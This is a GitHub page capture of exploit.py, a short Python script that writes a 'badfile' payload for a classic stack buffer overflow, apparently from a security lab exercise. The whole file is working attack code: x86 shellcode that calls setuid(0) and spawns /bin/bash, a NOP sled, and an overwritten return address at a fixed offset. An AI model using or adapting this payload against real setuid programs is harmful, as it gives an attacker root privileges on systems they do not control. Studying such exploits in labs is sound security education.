-
Notifications
You must be signed in to change notification settings - Fork 1
/
exploit.py
50 lines (41 loc) · 1.36 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
#!/usr/bin/python3
shellcode= (
# ----------- setuid(0) ----------------------
"\x31\xc0" # xorl %eax,%eax
"\x31\xdb" # xorl %ebx,%ebx
"\xb0\xd5" # movb $0xd5,%al
"\xcd\x80" # int $0x80
# ----------- execv("/bin/sh") ---------------
"\x31\xc0" # xorl %eax,%eax
"\x50" # pushl %eax
"\x68""bash" # to execute /bin/bash
"\x68""////" #
# "\x68""//sh" # pushl $0x68732f2f
"\x68""/bin" # pushl $0x6e69622f
"\x89\xe3" # movl %esp,%ebx
"\x50" # pushl %eax
"\x53" # pushl %ebx
"\x89\xe1" # movl %esp,%ecx
"\x99" # cdq
"\xb0\x0b" # movb $0x0b,%al
"\xcd\x80" # int $0x80
).encode('latin-1')
# set file size according to buffer size and offset
file_size=300
# Fill the content with NOPs
content = bytearray(0x90 for i in range(file_size)) # ---NOP---RET---SHELLCODE
# Put the shellcode at the end
start = file_size - len(shellcode)
content[start:] = shellcode
print("shellcode is written after: ", start, " bytes")
# setup return address
ebp_offset = 108
return_addr_offset = ebp_offset + 4 # 108=offset of frame pointer so ra @ 112
addr_ebp = 0xbffff098
# ret = 0xbffff0e8 + 116 #0xbffff07c
ret = addr_ebp + 116 # address of ebp + offset # where to return after
# Put the address at offset 112
content[return_addr_offset:return_addr_offset+4] = (ret).to_bytes(4, byteorder='little') # jump address is written after 112 NOP slides
#write
with open('badfile', 'wb') as f:
f.write(content)